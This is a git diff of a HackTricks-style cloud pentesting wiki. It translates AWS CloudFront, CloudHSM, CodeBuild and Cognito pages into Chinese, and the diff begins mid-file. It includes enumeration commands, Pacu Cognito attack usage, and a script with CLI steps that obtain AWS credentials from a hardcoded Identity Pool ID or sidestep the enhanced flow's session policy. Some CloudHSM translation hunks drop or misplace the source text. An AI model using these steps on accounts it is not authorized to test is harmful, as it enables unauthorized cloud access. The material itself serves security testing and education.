通过其全球边缘位置网络分发您的静态和动态内容。当您使用通过 Amazon CloudFront 托管的请求内容时,请求会被路由到最近的边缘位置,从而提供最低延迟以实现最佳性能。当 **CloudFront 访问日志** 被启用时,您可以记录每个用户请求访问您网站和分发的请求。与 S3 访问日志一样,这些日志也 **存储在 Amazon S3 中以实现持久和耐用的存储**。启用日志记录本身没有费用,但由于日志存储在 S3 中,您将为 S3 使用的存储付费。 -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. +日志文件在一段时间内捕获数据,具体取决于 Amazon CloudFront 为该分发接收到的请求数量,这将决定生成的日志文件数量。重要的是要知道,这些日志文件并不是在 S3 上创建或写入的。S3 只是它们在日志文件满时被传送到的地方。**Amazon CloudFront 保留这些日志,直到它们准备好传送到 S3**。同样,具体取决于这些日志文件的大小,这种传送可能需要 **一到 24 小时**。 -**By default cookie logging is disabled** but you can enable it. +**默认情况下,Cookie 日志记录是禁用的**,但您可以启用它。 ### Functions -You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). +您可以在 CloudFront 中创建函数。这些函数将具有定义的 **cloudfront 端点**,并将运行声明的 **NodeJS 代码**。这段代码将在运行在 AWS 管理机器上的 **沙箱** 内运行(您需要一个沙箱绕过才能成功逃逸到底层操作系统)。 -As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. +由于这些函数不是在用户的 AWS 账户中运行,因此没有附加 IAM 角色,因此无法通过滥用此功能实现直接权限提升。 ### Enumeration - ```bash aws cloudfront list-distributions aws cloudfront get-distribution --id # Just get 1 @@ -28,21 +27,16 @@ aws cloudfront get-function --name TestFunction function_code.js aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" ``` - -## Unauthenticated Access +## 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md {{#endref}} -## Post Exploitation +## 后期利用 {{#ref}} ../aws-post-exploitation/aws-cloudfront-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md index 55216fa7e..a3cdaf811 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md @@ -2,70 +2,49 @@ {{#include ../../../banners/hacktricks-training.md}} -## HSM - Hardware Security Module +## HSM - 硬件安全模块 -Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. +Cloud HSM 是一个 FIPS 140 级别二验证的 **硬件设备**,用于安全的加密密钥存储(请注意,CloudHSM 是一个硬件设备,而不是虚拟化服务)。它是一个预装了 5.3.13 的 SafeNetLuna 7000 设备。这里有两个固件版本,您选择哪个版本实际上取决于您的具体需求。一个是用于 FIPS 140-2 合规性,还有一个更新版本可以使用。 -The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads +CloudHSM 的不寻常之处在于它是一个物理设备,因此它 **不与其他客户共享**,或者通常称为多租户。它是专用的单租户设备,仅供您的工作负载使用。 -Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be. +通常,设备在有容量的情况下可在 15 分钟内提供,但在某些区域可能无法提供。 -Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. +由于这是一个专门为您提供的物理设备,**密钥存储在设备上**。密钥需要 **复制到另一个设备**、备份到离线存储,或导出到备用设备。**该设备不受** S3 或 AWS 的任何其他服务(如 KMS)的支持。 -In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. +在 **CloudHSM** 中,您必须 **自行扩展服务**。您必须配置足够的 CloudHSM 设备,以处理您根据所选择的加密算法实施的加密需求。\ +密钥管理服务的扩展由 AWS 执行,并根据需求自动扩展,因此随着您的使用增长,所需的 CloudHSM 设备数量也可能增加。在扩展解决方案时请记住这一点,如果您的解决方案具有自动扩展功能,请确保您的最大扩展考虑到足够的 CloudHSM 设备来服务该解决方案。 -Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. +就像扩展一样,**CloudHSM 的性能取决于您**。性能因使用的加密算法和您需要访问或检索密钥以加密数据的频率而异。密钥管理服务的性能由亚马逊处理,并根据需求自动扩展。CloudHSM 的性能通过添加更多设备来实现,如果您需要更高的性能,您可以添加设备或更改加密方法为更快的算法。 -If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. +如果您的解决方案是 **多区域的**,您应该在第二个区域添加几个 **CloudHSM 设备,并通过私有 VPN 连接解决跨区域连接问题**,或采用某种方法确保在每一层连接中流量始终受到保护。如果您有多区域解决方案,您需要考虑如何 **复制密钥并在您运营的区域设置额外的 CloudHSM 设备**。您可能很快就会进入一个场景,您在多个区域分布有六个或八个设备,从而实现加密密钥的完全冗余。 -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. +**CloudHSM** 是一个企业级服务,用于安全密钥存储,可以作为 **企业的信任根**。它可以在 PKI 中存储私钥和在 X509 实现中的证书颁发机构密钥。除了在对称算法(如 AES)中使用的对称密钥外,**KMS 仅存储和物理保护对称密钥(不能充当证书颁发机构)**,因此如果您需要存储 PKI 和 CA 密钥,两个或三个 CloudHSM 可能是您的解决方案。 -**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ -Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. +**CloudHSM 的成本明显高于密钥管理服务**。CloudHSM 是一个硬件设备,因此您需要固定成本来配置 CloudHSM 设备,然后是运行该设备的每小时费用。目前每小时的费用为 1.88 美元,或每月大约 1,373 美元。 -**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. +使用 CloudHSM 的最常见原因是您必须满足的合规标准。**KMS 不支持非对称密钥的数据支持。CloudHSM 允许您安全地存储非对称密钥**。 -### CloudHSM Suggestions +**公钥在配置期间安装在 HSM 设备上**,因此您可以通过 SSH 访问 CloudHSM 实例。 -1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. -2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. -3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. -4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. -5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. -6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. -7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. +### 什么是硬件安全模块 -The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. +硬件安全模块(HSM)是一个专用的加密设备,用于生成、存储和管理加密密钥并保护敏感数据。它旨在通过物理和电子隔离加密功能与系统的其余部分来提供高水平的安全性。 -The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. +HSM 的工作方式可能因具体型号和制造商而异,但通常会发生以下步骤: -The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. +1. **密钥生成**:HSM 使用安全随机数生成器生成随机加密密钥。 +2. **密钥存储**:密钥 **安全地存储在 HSM 内部,只有授权用户或进程才能访问**。 +3. **密钥管理**:HSM 提供一系列密钥管理功能,包括密钥轮换、备份和撤销。 +4. **加密操作**:HSM 执行一系列加密操作,包括加密、解密、数字签名和密钥交换。这些操作在 HSM 的安全环境中 **执行,保护免受未经授权的访问和篡改**。 +5. **审计日志**:HSM 记录所有加密操作和访问尝试,可用于合规性和安全审计目的。 -### What is a Hardware Security Module +HSM 可用于广泛的应用,包括安全在线交易、数字证书、安全通信和数据加密。它们通常用于需要高安全性水平的行业,如金融、医疗保健和政府。 -A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system. - -The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur: - -1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator. -2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**. -3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation. -4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering. -5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes. - -HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government. - -Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure. - -### Enumeration +总体而言,HSM 提供的高安全性使得 **从中提取原始密钥非常困难,尝试这样做通常被视为安全漏洞**。然而,可能存在 **某些场景**,在这些场景中,**授权人员可以提取原始密钥**,例如在密钥恢复程序的情况下。 +### 枚举 ``` TODO ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md index bd54cd791..0759c9261 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md @@ -4,30 +4,29 @@ ## CodeBuild -AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: +AWS **CodeBuild** 被认为是一个 **完全托管的持续集成服务**。该服务的主要目的是自动化编译源代码、执行测试和打包软件以便于部署的过程。CodeBuild 提供的主要好处在于它能够减轻用户配置、管理和扩展构建服务器的需求。这种便利性是因为该服务本身管理这些任务。AWS CodeBuild 的基本功能包括: -1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. -2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. -3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. +1. **托管服务**:CodeBuild 管理和扩展构建服务器,使用户免于服务器维护。 +2. **持续集成**:它与开发和部署工作流程集成,自动化软件发布过程中的构建和测试阶段。 +3. **包生产**:在构建和测试阶段之后,它准备软件包,使其准备好进行部署。 -AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. +AWS CodeBuild 与其他 AWS 服务无缝集成,提高了 CI/CD(持续集成/持续部署)管道的效率和可靠性。 -### **Github/Gitlab/Bitbucket Credentials** +### **Github/Gitlab/Bitbucket 凭证** -#### **Default source credentials** +#### **默认源凭证** -This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. +这是一个遗留选项,可以配置一些 **访问**(如 Github 令牌或应用程序),这些访问将 **在 codebuild 项目之间共享**,以便所有项目都可以使用这组配置的凭证。 -The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. +存储的凭证(令牌、密码等)由 **codebuild 管理**,并且没有任何公共方式可以通过 AWS API 检索它们。 -#### Custom source credential +#### 自定义源凭证 -Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. +根据存储库平台(Github、Gitlab 和 Bitbucket),提供不同的选项。但一般来说,任何需要 **存储令牌或密码的选项都将作为秘密存储在秘密管理器中**。 -This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. +这允许 **不同的 codebuild 项目使用不同配置的访问** 提供者,而不仅仅是使用配置的默认访问。 ### Enumeration - ```bash # List external repo creds (such as github tokens) ## It doesn't return the token but just the ARN where it's located @@ -48,10 +47,9 @@ aws codebuild list-build-batches-for-project --project-name aws codebuild list-reports aws codebuild describe-test-cases --report-arn ``` - ### Privesc -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codebuild权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codebuild-privesc.md @@ -74,7 +72,3 @@ In the following page, you can check how to **abuse codebuild permissions to esc - [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md index c870c1791..956cff7a3 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -4,31 +4,30 @@ ## Cognito -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. +Amazon Cognito 用于 **身份验证、授权和用户管理** 在网络和移动应用程序中。它允许用户灵活地直接使用 **用户名和密码** 登录,或通过 **第三方** 间接登录,包括 Facebook、Amazon、Google 或 Apple。 -Central to Amazon Cognito are two primary components: +Amazon Cognito 的核心是两个主要组件: -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. +1. **用户池**:这些是为您的应用用户设计的目录,提供 **注册和登录功能**。 +2. **身份池**:这些池在 **授权用户访问不同的 AWS 服务** 中发挥重要作用。它们并不直接参与登录或注册过程,但在身份验证后对资源访问至关重要。 -### **User pools** +### **用户池** -To learn what is a **Cognito User Pool check**: +要了解什么是 **Cognito 用户池检查**: {{#ref}} cognito-user-pools.md {{#endref}} -### **Identity pools** +### **身份池** -The learn what is a **Cognito Identity Pool check**: +要了解什么是 **Cognito 身份池检查**: {{#ref}} cognito-identity-pools.md {{#endref}} -## Enumeration - +## 枚举 ```bash # List Identity Pools aws cognito-identity list-identity-pools --max-results 60 @@ -72,35 +71,30 @@ aws cognito-idp get-user-pool-mfa-config --user-pool-id ## Get risk configuration aws cognito-idp describe-risk-configuration --user-pool-id ``` +### 身份池 - 未认证枚举 -### Identity Pools - Unauthenticated Enumeration +仅仅**知道身份池ID**,您可能能够**获取与未认证**用户(如果有的话)相关联的角色的凭证。[**查看方法**](cognito-identity-pools.md#accessing-iam-roles)。 -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). +### 用户池 - 未认证枚举 -### User Pools - Unauthenticated Enumeration +即使您**不知道Cognito中的有效用户名**,您也可能能够**枚举**有效的**用户名**,**暴力破解****密码**,甚至**注册新用户**,只需**知道应用客户端ID**(通常在源代码中找到)。[**查看方法**](cognito-user-pools.md#registration)**.** -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** - -## Privesc +## 权限提升 {{#ref}} ../../aws-privilege-escalation/aws-cognito-privesc.md {{#endref}} -## Unauthenticated Access +## 未认证访问 {{#ref}} ../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md {{#endref}} -## Persistence +## 持久性 {{#ref}} ../../aws-persistence/aws-cognito-persistence.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index 024c7ea91..0c73383a2 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -2,16 +2,15 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: - -- Amazon Cognito user pools -- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple -- Providers compliant with OpenID Connect (OIDC) -- SAML (Security Assertion Markup Language) identity providers -- Developer authenticated identities +身份池通过使您的用户能够**获取临时凭证**,在其中发挥着至关重要的作用。这些凭证对于访问各种AWS服务至关重要,包括但不限于Amazon S3和DynamoDB。身份池的一个显著特点是它们支持匿名访客用户以及多种身份提供者进行用户身份验证。支持的身份提供者包括: +- Amazon Cognito用户池 +- 社交登录选项,如Facebook、Google、使用Amazon登录和使用Apple登录 +- 符合OpenID Connect (OIDC)的提供者 +- SAML (安全声明标记语言)身份提供者 +- 开发者认证身份 ```python # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: import boto3 @@ -24,74 +23,64 @@ identity_pool_id = 'your-identity-pool-id' # Add an identity provider to the identity pool response = client.set_identity_pool_roles( - IdentityPoolId=identity_pool_id, - Roles={ - 'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', - 'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', - } +IdentityPoolId=identity_pool_id, +Roles={ +'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', +'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', +} ) # Print the response from AWS print(response) ``` - ### Cognito Sync -To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs. +要生成身份池会话,您首先需要**生成身份 ID**。这个身份 ID 是**该用户会话的标识**。这些标识可以有多达 20 个数据集,可以存储多达 1MB 的键值对。 -This is **useful to keep information of a user** (who will be always using the same Identity ID). +这对于**保持用户信息**(将始终使用相同的身份 ID)是**有用的**。 -Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...). +此外,服务**cognito-sync**是允许**管理和同步这些信息**的服务(在数据集中,发送信息到流和 SNS 消息...)。 ### Tools for pentesting -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括“cognito\_\_enum”和“cognito\_\_attack”模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +有关模块功能的描述,请参见[博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2)的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 #### Usage -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: - +示例 cognito\_\_attack 用法,尝试在给定身份池和用户池客户端上进行用户创建和所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括不必要的账户创建和身份池升级。 -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. - -#### Installation - +#### 安装 ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### 用法 ```bash $ cognito-scanner --help ``` - For more information check https://github.com/padok-team/cognito-scanner -## Accessing IAM Roles +## 访问 IAM 角色 -### Unauthenticated +### 未认证 -The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). +攻击者需要知道的唯一信息是 **在 Cognito 应用中获取 AWS 凭证** 的 **身份池 ID**,并且这个 **ID 必须硬编码** 在 web/mobile **应用程序** 中以供使用。一个 ID 看起来像这样:`eu-west-1:098e5341-8364-038d-16de-1865e435da3b`(它无法通过暴力破解获得)。 > [!TIP] -> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` - -If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: +> 通过创建的 **IAM Cognito 未认证角色默认被称为** `Cognito_Unauth_Role` +如果你发现一个硬编码的身份池 ID 并且它允许未认证用户,你可以通过以下方式获取 AWS 凭证: ```python import requests @@ -105,8 +94,8 @@ r = requests.post(url, json=params, headers=headers) json_resp = r.json() if not "IdentityId" in json_resp: - print(f"Not valid id: {id_pool_id}") - exit +print(f"Not valid id: {id_pool_id}") +exit IdentityId = r.json()["IdentityId"] @@ -117,23 +106,19 @@ r = requests.post(url, json=params, headers=headers) print(r.json()) ``` - -Or you could use the following **aws cli commands**: - +或者你可以使用以下 **aws cli 命令**: ```bash aws cognito-identity get-id --identity-pool-id --no-sign aws cognito-identity get-credentials-for-identity --identity-id --no-sign ``` - > [!WARNING] -> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. +> 请注意,默认情况下,未经身份验证的 cognito **用户无法拥有任何权限,即使通过策略分配了权限**。请查看以下部分。 -### Enhanced vs Basic Authentication flow +### 增强与基本身份验证流程 -The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services). - -However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. +上一部分遵循了 **默认增强身份验证流程**。此流程为生成的 IAM 角色会话设置了 **限制性** [**会话策略**](../../aws-basic-information/#session-policies)。该策略仅允许会话 [**使用此列表中的服务**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)(即使该角色可以访问其他服务)。 +然而,如果 **身份池启用了“基本(经典)流程”**,则有一种方法可以绕过此限制,用户将能够使用该流程获取会话,而该会话 **将没有限制性会话策略**。 ```bash # Get auth ID aws cognito-identity get-id --identity-pool-id --no-sign @@ -145,51 +130,46 @@ aws cognito-identity get-open-id-token --identity-id --no-sign ## If you don't know the role_arn use the previous enhanced flow to get it aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign ``` - > [!WARNING] -> If you receive this **error**, it's because the **basic flow is not enabled (default)** +> 如果您收到此 **错误**,则是因为 **基本流程未启用(默认)** > `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` -Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). +拥有一组 IAM 凭证后,您应该检查 [您拥有的访问权限](../../#whoami) 并尝试 [提升权限](../../aws-privilege-escalation/)。 -### Authenticated +### 已认证 > [!NOTE] -> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. +> 请记住,**已认证用户**可能会被授予 **不同的权限**,因此如果您可以 **在应用程序内注册**,请尝试这样做并获取新凭证。 -There could also be **roles** available for **authenticated users accessing the Identity Poo**l. +对于 **访问身份池的已认证用户**,可能还有 **角色** 可用。 -For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. +为此,您可能需要访问 **身份提供者**。如果是 **Cognito 用户池**,也许您可以利用默认行为 **自己创建一个新用户**。 > [!TIP] -> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` +> 通过创建的 **IAM Cognito 认证角色** 默认称为 `Cognito_Auth_Role` -Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). +无论如何,**以下示例**假设您已经在用于访问身份池的 **Cognito 用户池** 中登录(不要忘记,其他类型的身份提供者也可以被配置)。
aws cognito-identity get-id \
-    --identity-pool-id <identity_pool_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-pool-id <identity_pool_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
-# Get the identity_id from the previous commnad response
+# 从上一个命令响应中获取 identity_id
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-id <identity_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 
-# In the IdToken you can find roles a user has access because of User Pool Groups
-# User the --custom-role-arn to get credentials to a specific role
+# 在 IdToken 中,您可以找到用户因用户池组而拥有的角色
+# 使用 --custom-role-arn 获取特定角色的凭证
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
+--identity-id <identity_id> \
     --custom-role-arn <role_arn> \
